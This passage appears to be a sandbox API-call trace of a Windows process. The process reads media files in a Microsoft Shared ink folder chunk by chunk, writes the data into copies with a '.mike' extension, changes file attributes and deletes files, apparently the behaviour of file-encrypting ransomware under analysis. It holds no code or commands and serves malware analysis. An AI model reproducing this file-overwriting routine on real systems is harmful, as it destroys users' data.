lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0044.511] ReadFile (in: hFile=0x264, lpBuffer=0x21dafec, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21dafec*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.511] CloseHandle (hObject=0x264) returned 1 [0044.512] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", lpFilePart=0x0) returned 0x4d [0044.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.512] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.512] GetFileType (hFile=0x264) returned 0x1 [0044.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.512] GetFileType (hFile=0x264) returned 0x1 [0044.512] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0044.512] WriteFile (in: hFile=0x264, lpBuffer=0x21e5554*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21e5554*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.512] CloseHandle (hObject=0x264) returned 1 [0044.513] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.513] GetFileType (hFile=0x264) returned 0x1 [0044.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.513] GetFileType (hFile=0x264) returned 0x1 [0044.513] SetFilePointer (in: hFile=0x264, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0044.514] ReadFile (in: hFile=0x264, lpBuffer=0x21e7fc4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21e7fc4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.514] CloseHandle (hObject=0x264) returned 1 [0044.514] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", lpFilePart=0x0) returned 0x4d [0044.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.514] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.514] GetFileType (hFile=0x264) returned 0x1 [0044.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.515] GetFileType (hFile=0x264) returned 0x1 [0044.515] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0044.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.515] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.515] GetFileType (hFile=0x264) returned 0x1 [0044.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.515] GetFileType (hFile=0x264) returned 0x1 [0044.515] SetFilePointer (in: hFile=0x264, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0044.515] ReadFile (in: hFile=0x264, lpBuffer=0x21f4f9c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21f4f9c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.516] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.516] GetFileType (hFile=0x264) returned 0x1 [0044.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.516] GetFileType (hFile=0x264) returned 0x1 [0044.516] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xca20 [0044.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.517] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.517] GetFileType (hFile=0x264) returned 0x1 [0044.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.517] GetFileType (hFile=0x264) returned 0x1 [0044.517] SetFilePointer (in: hFile=0x264, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xf000 [0044.517] ReadFile (in: hFile=0x264, lpBuffer=0x2201f74, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2201f74*, lpNumberOfBytesRead=0x2af080*=0x600, lpOverlapped=0x0) returned 1 [0044.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.518] GetFileType (hFile=0x264) returned 0x1 [0044.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.518] GetFileType (hFile=0x264) returned 0x1 [0044.518] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xf220 [0044.518] WriteFile (in: hFile=0x264, lpBuffer=0x2206624*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2206624*, lpNumberOfBytesWritten=0x2af074*=0x600, lpOverlapped=0x0) returned 1 [0044.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0044.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.518] GetFileType (hFile=0x264) returned 0x1 [0044.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0044.518] GetFileType (hFile=0x264) returned 0x1 [0044.519] WriteFile (in: hFile=0x264, lpBuffer=0x2209858*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2209858*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0044.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", dwFileAttributes=0x80) returned 0 [0044.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", lpFilePart=0x0) returned 0x4d [0044.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0044.521] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ba7180, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4ba7180, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4bcd2e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xf820)) returned 1 [0044.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0044.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", lpFilePart=0x0) returned 0x4d [0044.521] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike")) returned 1 [0044.523] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.524] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.524] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0044.524] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0044.538] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0044.539] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.539] GetFileType (hFile=0x264) returned 0x1 [0044.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0044.539] GetFileType (hFile=0x264) returned 0x1 [0044.539] CloseHandle (hObject=0x264) returned 1 [0044.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.539] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0044.539] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0044.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.540] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), fInfoLevelId=0x0, lpFileInformation=0x220c9ec | out: lpFileInformation=0x220c9ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x244c354, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x244c354, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a55e497, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x30200)) returned 1 [0044.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.540] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), fInfoLevelId=0x0, lpFileInformation=0x220ccfc | out: lpFileInformation=0x220ccfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x244c354, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x244c354, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a55e497, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x30200)) returned 1 [0044.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.540] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0044.541] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0044.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.541] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.541] GetFileType (hFile=0x264) returned 0x1 [0044.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.541] GetFileType (hFile=0x264) returned 0x1 [0044.542] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0044.542] WriteFile (in: hFile=0x264, lpBuffer=0x220db1c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x220db1c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0044.542] CloseHandle (hObject=0x264) returned 1 [0044.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.543] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), fInfoLevelId=0x0, lpFileInformation=0x220d634 | out: lpFileInformation=0x220d634*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x244c354, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x244c354, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a55e497, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x30200)) returned 1 [0044.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.543] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.543] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.543] GetFileType (hFile=0x264) returned 0x1 [0044.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.543] GetFileType (hFile=0x264) returned 0x1 [0044.543] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0044.543] ReadFile (in: hFile=0x264, lpBuffer=0x220ec40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x220ec40*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.545] CloseHandle (hObject=0x264) returned 1 [0044.547] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.547] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.547] GetFileType (hFile=0x264) returned 0x1 [0044.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.547] GetFileType (hFile=0x264) returned 0x1 [0044.547] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0044.547] WriteFile (in: hFile=0x264, lpBuffer=0x22191a8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22191a8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.547] CloseHandle (hObject=0x264) returned 1 [0044.548] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.548] 